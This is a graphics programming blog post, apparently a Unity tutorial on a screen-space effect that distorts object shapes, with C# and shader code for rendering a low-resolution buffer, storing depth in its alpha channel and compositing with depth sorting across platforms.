<p>There are lots of potential issues you’ll run into with this effect if you use it in a real project. For example, handling non uniform object scale can present some odd issues, especially if you don’t want to break static batching by passing scale to the object’s material. I think you could get around this by encoding the scale of objects into their vertex color, but if you know the scale of your object at bake time, you should probably just resize your mesh.</p>
<p>In reality though, the effect as presented here is likely not going to make your art team very happy. I think you’d likely run into artists wanting to author custom TAMs with different types of strokes, and maps for each object to control which type of stroke was used where.</p>
<p>That about wraps things up. This was a lot of fun! If you have any questions, shoot me a message <a href="https://twitter.com/khalladay">on twitter</a>. I’d love to see more projects using this type of effect, so send me screenshots of anything you build with it!</p>
<p>[Update: 5/18/2020: Thanks to @__seb for pointing out a typo in the hatching shader]</p>
Distorting Object Shapes in Screen Space2017-02-06T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/02/06/ObjectShapeDistortion<p>Today I’m going to walk through a different take on the distortion effect that I presented awhile ago in the post <a href="http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion.html">“Screen Space Distortion and a Sci-fi Shield Effect.”</a> This time, instead of using distortion to see “through” an object, we are going to distort the shape of objects themselves. When it’s all done, it’s going to look something like this:</p>
<div align="center">
<img src="/images/post_images/2017-02-05/distortinggif.gif" style="width:360px; height:279px" /><br />
</div>
<p>Pretty snazzy right? The tricky part of the effect isn’t the distortion, it’s in getting the edges of the distorted objects to sort “correctly”. Or…as correctly as the edge of an object distorted in screen space can.</p>
<p>All of this was done using Unity 5.5.x, so if you’ve arrived here from the future and are using a different version, you may have to tweak what I present here.</p>
<h3>A High Level View of the Effect</h3>
<p>Before we dive into the implementation details, here’s a quick outline of what we’re going to do to make this effect work:</p>
<ul>
<li>Render all the non-distorting objects into our main RenderTexture</li>
<li>Blit the RGB channels of that buffer into a lower res RT</li>
<li>Render the distorting objects (undistorted) into the lower res RT using a custom shader</li>
<li>Combine all of these buffers together to make the effect</li>
</ul>
<p>Sounds fun right? Let’s get started.</p>
<h3>Some Initial Set Up</h3>
<p>The entire C# part of the effect is going to live on a single script that we’ll attach to the main camera, which we’ll get set up here.</p>
<p>I implemented this with two cameras, mostly so that I didn’t have to touch culling masks / settings on the main scene camera, which we use to get the color buffer that doesn’t have distorted objects in it. The second camera, which the script creates, is the one we use to render the distorting objects.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="n">Camera</span> <span class="n">cam</span><span class="p">;</span>
<span class="k">private</span> <span class="n">Camera</span> <span class="n">maskCam</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Material</span> <span class="n">compositeMat</span><span class="p">;</span>
<span class="k">public</span> <span class="n">Material</span> <span class="n">stripAlphaMat</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">speed</span> <span class="p">=</span> <span class="m">1.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">scaleFactor</span> <span class="p">=</span> <span class="m">1.0f</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">float</span> <span class="n">magnitude</span> <span class="p">=</span> <span class="m">0.01f</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledWidth</span><span class="p">;</span>
<span class="k">private</span> <span class="kt">int</span> <span class="n">scaledHeight</span><span class="p">;</span>
<span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">cam</span> <span class="p">=</span> <span class="n">GetComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="n">scaledWidth</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">scaledHeight</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">cam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="p">=</span> <span class="p">~(</span><span class="m">1</span> <span class="p"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="nf">NameToLayer</span><span class="p">(</span><span class="s">"Distortion"</span><span class="p">));</span>
<span class="n">cam</span><span class="p">.</span><span class="n">depthTextureMode</span> <span class="p">=</span> <span class="n">DepthTextureMode</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">maskCam</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">GameObject</span><span class="p">(</span><span class="s">"Distort Mask Cam"</span><span class="p">).</span><span class="n">AddComponent</span><span class="p"><</span><span class="n">Camera</span><span class="p">>();</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">enabled</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="p">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Nothing</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>There are a few things to note here: First, we need to determine how big we want our distorted color buffer to be, so I multiply the screen size by a float (scaleFactor). This is important for optimizing the effect for low-power devices. The smaller our second buffer is, the faster the effect will be, and the less memory it will use.</p>
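<p>To get a feel for what the scale factor buys you, here is a rough CPU-side sketch in Python (not Unity code). It mirrors the integer truncation used in Start() and estimates colour buffer memory, assuming 16 bytes per pixel (four 32-bit float channels, as with the ARGBFloat format used later in this post). The function names and the 1920x1080 screen size are made up for illustration, and a real GPU allocation may be padded or include a depth buffer on top of this.</p>

```python
def scaled_size(screen_width, screen_height, scale_factor):
    """Mirror the (int) casts in Start(): multiply, then truncate toward zero."""
    return int(screen_width * scale_factor), int(screen_height * scale_factor)


def color_buffer_bytes(width, height, bytes_per_pixel=16):
    """Estimate colour memory; 16 bytes/pixel assumes four 32-bit float channels."""
    return width * height * bytes_per_pixel


if __name__ == "__main__":
    # Hypothetical 1080p screen at a few scale factors.
    for scale in (1.0, 0.5, 0.25):
        w, h = scaled_size(1920, 1080, scale)
        mib = color_buffer_bytes(w, h) / (1024 * 1024)
        print(f"scale {scale}: {w}x{h}, ~{mib:.1f} MiB")
```

<p>Because both dimensions shrink, halving the scale factor cuts the estimated colour memory (and the number of pixels to shade) to roughly a quarter.</p>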
<p>The other important thing to note is that I’m setting the depthTextureMode on the main camera. This is so that the camera will output a depth texture that we can see in our shaders, which we’re going to use to help us sort our distorting objects later on.</p>
<p>The other boring bit I want to get out of the way is the update function:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">scaleFactor</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">scaleFactor</span><span class="p">,</span> <span class="m">0.01f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">scaledWidth</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">scaledHeight</span> <span class="p">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="n">Screen</span><span class="p">.</span><span class="n">height</span> <span class="p">*</span> <span class="n">scaleFactor</span><span class="p">);</span>
<span class="n">magnitude</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Max</span><span class="p">(</span><span class="m">0.0f</span><span class="p">,</span> <span class="n">magnitude</span><span class="p">);</span>
<span class="n">Shader</span><span class="p">.</span><span class="nf">SetGlobalFloat</span><span class="p">(</span><span class="s">"_DistortionOffset"</span><span class="p">,</span> <span class="p">-</span><span class="n">Time</span><span class="p">.</span><span class="n">time</span> <span class="p">*</span> <span class="n">speed</span><span class="p">);</span>
<span class="n">Shader</span><span class="p">.</span><span class="nf">SetGlobalFloat</span><span class="p">(</span><span class="s">"_DistortionAmount"</span><span class="p">,</span> <span class="n">magnitude</span><span class="p">/</span><span class="m">100.0f</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Nothing really special here, we’re updating a bunch of values per frame so we can do things like change the scaling value at runtime, and we need to set a few shader parameters in order to update the distortion effect.</p>
<p>The rest of the logic for the effect is going to take place inside OnRenderImage:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//cool stuff goes here :)</span>
<span class="p">}</span></code></pre></figure>
<p>If you attach this to your main camera and hit play right now, you’ll see a lovely abyss of black fill your screen. Stare into it for a moment before continuing below.</p>
<div align="center">
<img src="/images/post_images/2017-02-05/black.png" style="width:300; height:350" /><br />
</div>
<h3>Rendering the DistortionRT</h3>
<p>As mentioned above, the first thing we need to do in our OnRenderImage function is to get our RenderTextures filled with some colour (and depth!). Since we’re working in OnRenderImage, we already have the main camera’s output in RT form (the src argument in the function signature), but we need to get our low res colour buffer built up.</p>
<div style="background-color:#AAEEAA; border-style:solid; border-width:1px">In the interest of simplicity, I'm going to refer to our low res RenderTexture as the "distortingRT," because we are going to render the things we want to distort into it.
</div>
<p><br /></p>
<p>Before we render our distorting objects however, we need to copy the contents of the main RT’s RGB channels into the distortingRT. This will help eliminate ugly artifacts around the edges of our wobbly GameObjects, which are caused by using a lower resolution image to grab their colours from. This artifact ends up looking like this:</p>
<div align="center">
<img src="/images/post_images/2017-02-05/lowresartifact.PNG" /><br />
</div>
<p>We also need to output a specific constant into the alpha channel of the distortingRT. We are going to be using the alpha channel as a low resolution depth buffer to let us sort our distorting objects with the ones seen by the main camera, but before we do that, we need a clean slate to work with, so we need to fill the alpha channel of distortingRT with a value that represents the farthest depth possible (the far clip plane).</p>
<p>This is simple, but only if you’re aware of how different platforms handle depth. On some platforms (DX11/12 and Metal for example), the depth buffer goes from 1 to 0, with 1 (or white) being the closest objects, and 0 being the edge of the far plane. Other platforms (like OpenGL) go from 0 to 1. We need our shader to output the farthest depth value possible for anywhere that doesn’t contain a distorting object, so we need to output different values per platform.</p>
<p>Luckily, Unity has a handy preprocessor define to let us know which platform we’re using:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="cp">#if UNITY_REVERSED_Z
</span> <span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="m">0.0</span><span class="p">;</span>
<span class="cp">#else
</span> <span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="m">1.0</span><span class="p">;</span>
<span class="cp">#endif
</span> <span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you aren’t familiar enough with image effect shaders to use the above snippet, the entire source for this article can be found <a href="https://github.com/khalladay/SinewaveShapeDistortion">here</a>, but as the rest is mostly boilerplate, I’m not going to include it here.</p>
<p>With our shader built, we can use that to copy what we need from one buffer to the other:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">distortingRT</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">,</span> <span class="n">stripAlphaMat</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>You’ll notice that instead of allocating the distortingRT earlier, we’re grabbing it here using RenderTexture.GetTemporary. The Unity docs have this to say:</p>
<blockquote>
<p>If you are doing a series of post-processing “blits”, it’s best for performance to get and release a temporary render texture for each blit, instead of getting one or two render textures upfront and reusing them.</p>
</blockquote>
<p>So that’s what we’ll do! We just have to remember to release the texture (with RenderTexture.ReleaseTemporary) at the end of the function, otherwise we’re going to allocate a lot of RTs very quickly.</p>
<h3>Rendering the Distorting Objects</h3>
<p>Next we need to render the things we want to distort into the distortingRT. There’s not really much special about doing this, except that I make sure to re-set up my camera parameters every frame so that other scripts can’t accidentally mess up our rendering.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">distortingRT</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">ARGBFloat</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">,</span> <span class="n">stripAlphaMat</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">CopyFrom</span><span class="p">(</span><span class="n">cam</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="p">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="p">=</span> <span class="m">1</span> <span class="p"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="nf">NameToLayer</span><span class="p">(</span><span class="s">"Distortion"</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">SetTargetBuffers</span><span class="p">(</span><span class="n">distortingRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">Render</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>If you aren’t on a platform that gives you access to floating point textures, you can actually use a RenderTextureFormat.Default here, but since you’ll have so little precision in your alpha channel, distorting objects won’t sort correctly as they get farther away from the camera. For relatively small scenes (like a single room) this likely won’t be noticeable, but you’ll start to see more artifacts as your environment gets larger.</p>
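<p>To make the precision problem concrete, here is a small Python sketch (an illustration, not part of the effect). It assumes a conventional 0 to 1 depth mapping, near and far clip planes of 0.3 and 1000, and that the default format gives you 8 bits per channel. The function names are hypothetical.</p>

```python
def depth_01(view_z, near=0.3, far=1000.0):
    """Conventional (non-reversed) z/w: 0 at the near plane, 1 at the far plane."""
    return (far / (far - near)) * (1.0 - near / view_z)


def to_8bit(value):
    """Quantize a 0..1 value to one of 256 levels, like an 8-bit alpha channel."""
    return int(round(value * 255.0))


if __name__ == "__main__":
    # Compare the float depth with what survives in an 8-bit channel.
    for view_z in (5.0, 10.0, 50.0, 100.0):
        d = depth_01(view_z)
        print(f"distance {view_z:>5}: depth {d:.6f} -> 8-bit level {to_8bit(d)}")
```

<p>With these assumed clip planes, objects 50 and 100 units from the camera land on the same 8-bit level, so a depth comparison can no longer tell them apart, while the floating point values stay distinct.</p>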
<p>If you take a peek at your distortingRT in the inspector, you should see your distorting objects being rendered on top of a copy of what the main camera sees. In the image below, the robots are actually located behind the other geometry in world space, but they are rendered in front of it for the purposes of the distortion buffer.</p>
<div align="center">
<img src="/images/post_images/2017-02-05/withdistort.PNG" /><br />
</div>
<p>This is expected and important. If we let our distorting objects sort now, then when an object is partly occluded, we won’t have all the colour information we need to distort the object behind the occluder, leading to artifacts along the edges of occluding objects. So to address this, we’re going to let our objects render on top of everything now, and manually do the depth sorting later. It’s fun! And speaking of rendering our distorting objects, I think now is as good a time as any to talk about what needs to be in the shaders that the distorting objects use.</p>
<h3>The Distorting Object Shader</h3>
<p>For the most part, this effect can work with any shader you want, provided you can make a small modification to the alpha output. For opaque shaders this is likely not an issue, since they don’t use the alpha channel for anything. Since transparent shaders use their alpha for blending, they’ll need a second pass to write the alpha.</p>
<p>As mentioned earlier, we’re going to use the alpha channel of distortingRT as a depth buffer, so that we can read those depths in our composite shader to do the depth sorting I was just talking about. That means we need our distorting materials to output their depth into the alpha channel. Again, this isn’t a terribly complicated thing to do, but we need to be aware of platform specific differences in handling depth and clip space.</p>
<p>First though, we need to get the data we need from our vertex shader to the fragment. This isn’t too difficult, since all we need are the z and w components of your transformed position vector (assuming you’re transforming it by the MVP, like so):</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span></code></pre></figure>
<p>The Z component of this vector is what I think about when I think of depth: it represents how far the vertex is from the camera. Unfortunately, this value can be well outside the 0 to 1 range that we need to be able to encode it into an alpha channel. To fix that, we can divide by the W component of the position vector, which will get us depth represented in relation to the view frustum. On Direct3D-style platforms, this is going to get us a value between 0 and 1; where Unity uses a reversed depth buffer (the UNITY_REVERSED_Z case from earlier), 1 is the near clip and 0 is the far clip, matching the depth buffer convention described above. In OpenGL, which uses a different sort of projection matrix, we’re going to end up with a value between -1 and 1. So we need to do some quick math to make sure we don’t try to put a negative value into our texture:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="c1">//other shading logic fills RGB channels</span>
<span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">screen</span><span class="p">.</span><span class="n">z</span> <span class="p">/</span> <span class="n">i</span><span class="p">.</span><span class="n">screen</span><span class="p">.</span><span class="n">w</span><span class="p">);</span>
<span class="c1">//using UNITY_REVERSED_Z because SHADER_TARGET_GLSL</span>
<span class="c1">//doesn't seem to work on my machine</span>
<span class="cp">#if !defined(UNITY_REVERSED_Z)
</span> <span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="p">(</span><span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">+</span> <span class="m">1.0</span><span class="p">)</span> <span class="p">*</span> <span class="m">0.5</span><span class="p">;</span>
<span class="cp">#endif
</span> <span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
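<p>If you want to convince yourself of the ranges involved, here is a CPU-side Python sketch of the z/w math. It is an approximation under stated assumptions: textbook perspective projections, near and far planes of 0.3 and 1000, and hypothetical function names. It is not Unity's actual matrix code.</p>

```python
def ndc_depth_gl(view_z, near, far):
    """OpenGL-style z/w: -1 at the near plane, +1 at the far plane."""
    return (far + near) / (far - near) - (2.0 * far * near) / ((far - near) * view_z)


def ndc_depth_reversed(view_z, near, far):
    """Reversed-Z style z/w: 1 at the near plane, 0 at the far plane."""
    return near * (far - view_z) / (view_z * (far - near))


def encode_alpha(ndc_depth, reversed_z):
    """Mirror the fragment shader above: only the -1..1 range needs remapping."""
    if reversed_z:
        return ndc_depth
    return (ndc_depth + 1.0) * 0.5


if __name__ == "__main__":
    near, far = 0.3, 1000.0  # assumed clip planes
    for view_z in (near, 10.0, far):
        gl = encode_alpha(ndc_depth_gl(view_z, near, far), reversed_z=False)
        rev = encode_alpha(ndc_depth_reversed(view_z, near, far), reversed_z=True)
        print(f"z={view_z}: GL alpha {gl:.6f}, reversed-Z alpha {rev:.6f}")
```

<p>Either way the value written to alpha ends up in the 0 to 1 range. The two conventions just disagree about which end is the near plane, which is why the comparison in the composite shader has to flip per platform.</p>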
<p>With that modification to your shaders, if you render only the alpha channel of your distortingRT, it should look something like this:</p>
<div align="center">
<img src="/images/post_images/2017-02-05/distortdepth.PNG" /><br />
</div>
<h3>The Composite Shader</h3>
<p>Now all that’s left is to put this all together. The composite shader is going to be the most complicated shader we’ve talked about so far, so I’m going to provide more of the code than I have been. To start with, let’s look at the data we are going to pass the shader:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_MainTex_ST</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DistortionRT</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_CameraDepthTexture</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DistortionOffset</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DistortionAmount</span><span class="p">;</span></code></pre></figure>
<p>_MainTex is going to be the regular old colour buffer that the main camera sees, nothing special there. _DistortionRT is the buffer that we’ve been building up until now, with the RGB of our distorting objects, and their depths stored in the alpha channel.</p>
<p>_CameraDepthTexture is going to be the depth texture created by the main camera. This is a globally accessible resource that Unity will make for us, since we specified a depth texture mode for the main camera at the beginning of this post.</p>
<p>Finally, the two floating point values are to control the distortion effect. _DistortionOffset controls how fast the distortion effect moves, and as we saw earlier, is passed in as Time.time multiplied by a constant. The higher we set the constant value, the faster the distortion wiggles. _DistortionAmount is also passed in from our effect script, and controls how wide we want the distortion effect to be. Changing this value determines whether we have a subtle wobble or a spastic glitch effect.</p>
<div align="center">
<img src="/images/post_images/2017-02-05/distortingmagnitude.gif" /><br />
</div>
<p>Got it? Good! I’m going to skip talking about the vertex shader because it’s just a passthrough:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">v2f</span> <span class="nf">vert</span><span class="p">(</span><span class="n">appdata</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">v2f</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertex</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="p">=</span> <span class="nf">TRANSFORM_TEX</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">uv</span><span class="p">,</span><span class="n">_MainTex</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>So let’s jump directly to the good part, the fragment shader. First let’s get the values we need from the _MainTex and the _CameraDepthTexture:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">screen</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">distortUVs</span> <span class="p">=</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">;</span>
<span class="cp">#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">=</span> <span class="m">1.0</span> <span class="p">-</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="kt">float</span> <span class="n">d</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_CameraDepthTexture</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">).</span><span class="n">r</span><span class="p">;</span></code></pre></figure>
<p>I wish I had a better explanation for the #ifdef section, but I don’t. Sometimes Unity accounts for the UV flip between platforms and sometimes it doesn’t. As far as I could tell, _MainTex is always right side up, and this set of defines will get us the correctly oriented UVs on whatever platform we’re using (I tested with GL, D3D11 and on an iPhone using Metal).</p>
<p>Other than that bit of engine specific weirdness, this should be pretty easy to follow so far. So let’s make it more complicated and grab our _DistortionRT value.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float4</span> <span class="n">distort</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_DistortionRT</span><span class="p">,</span> <span class="nf">fixed2</span><span class="p">(</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">x</span> <span class="p">+</span> <span class="nf">sin</span><span class="p">((</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">+</span> <span class="n">_DistortionOffset</span><span class="p">)</span> <span class="p">*</span> <span class="m">100</span><span class="p">)*</span><span class="n">_DistortionAmount</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">));</span></code></pre></figure>
<p>This is likely confusing. All the crazy UV math is because we want to apply the distortion effect here. So we use this math to grab the colour at the position that the distortion effect needs us to read from. I went over this in much more detail in my <a href="http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion.html">previous post</a> so I’m not going to talk much more about this here. For today’s purposes, here’s what you need to keep in mind:</p>
<ul>
<li>
<p>Using this UV math will distort the entire _DistortionRT buffer, so if we just returned this color, the entire screen would be distorted.</p>
</li>
<li>
<p>The alpha channel still contains depth</p>
</li>
</ul>
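<p>The UV math from the sample above can be sketched on the CPU like this. It is Python rather than shader code, the function name is hypothetical, and the frequency of 100 is the constant from the shader line. The amount used in the demo matches the script's default magnitude of 0.01 divided by 100.</p>

```python
import math


def distorted_u(u, v, offset, amount, frequency=100.0):
    """Shift the horizontal UV by a sine wave that varies with the vertical UV."""
    return u + math.sin((v + offset) * frequency) * amount


if __name__ == "__main__":
    amount = 0.01 / 100.0  # default magnitude, scaled as in Update()
    for row in range(5):
        v = row / 100.0
        print(f"v={v:.2f}: u=0.5 reads from u={distorted_u(0.5, v, 0.0, amount):.6f}")
```

<p>Each row of pixels reads from a slightly different horizontal position, never more than the distortion amount away from where it started, and changing the offset over time slides the wave up or down the screen.</p>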
<p>Now that we have these values, we need to finally depth sort our distorting objects. Luckily, we now have 2 depth values, so all we need to do is compare them. In cases where the depth from _DistortionRT is closer to the camera, we want to return the RGB from _DistortionRT, and otherwise, we want to return the regular old _MainTex. Pretty easy right?</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="cp">#if UNITY_REVERSED_Z
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p">></span> <span class="n">d</span><span class="p">);</span>
<span class="cp">#else
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p"><</span> <span class="n">d</span><span class="p">);</span>
<span class="cp">#endif</span></code></pre></figure>
<p>Remember that different platforms handle depth differently, so depending on which platform you’re on, your comparison will need to flip, as shown above.</p>
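<p>Here is the same selection logic as a per-pixel Python sketch, in case the lerp with a boolean looks odd. The function and argument names are hypothetical, and colours are plain RGB tuples, so this ignores the alpha channel that the shader also returns.</p>

```python
def composite(screen_rgb, distort_rgb, distort_depth, scene_depth, reversed_z):
    """Pick the distorted colour only where the distorting object is nearer."""
    if reversed_z:
        distort_is_closer = distort_depth > scene_depth  # larger value = closer
    else:
        distort_is_closer = distort_depth < scene_depth  # smaller value = closer
    return distort_rgb if distort_is_closer else screen_rgb


if __name__ == "__main__":
    screen = (0.1, 0.2, 0.3)
    distort = (0.9, 0.8, 0.7)
    print(composite(screen, distort, 0.8, 0.5, reversed_z=True))
    print(composite(screen, distort, 0.8, 0.5, reversed_z=False))
```

<p>Note that a pixel still holding the cleared alpha value (0 with reversed Z, 1 otherwise) can never pass the test, which is why we filled the alpha channel with the far plane value before rendering the distorting objects.</p>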
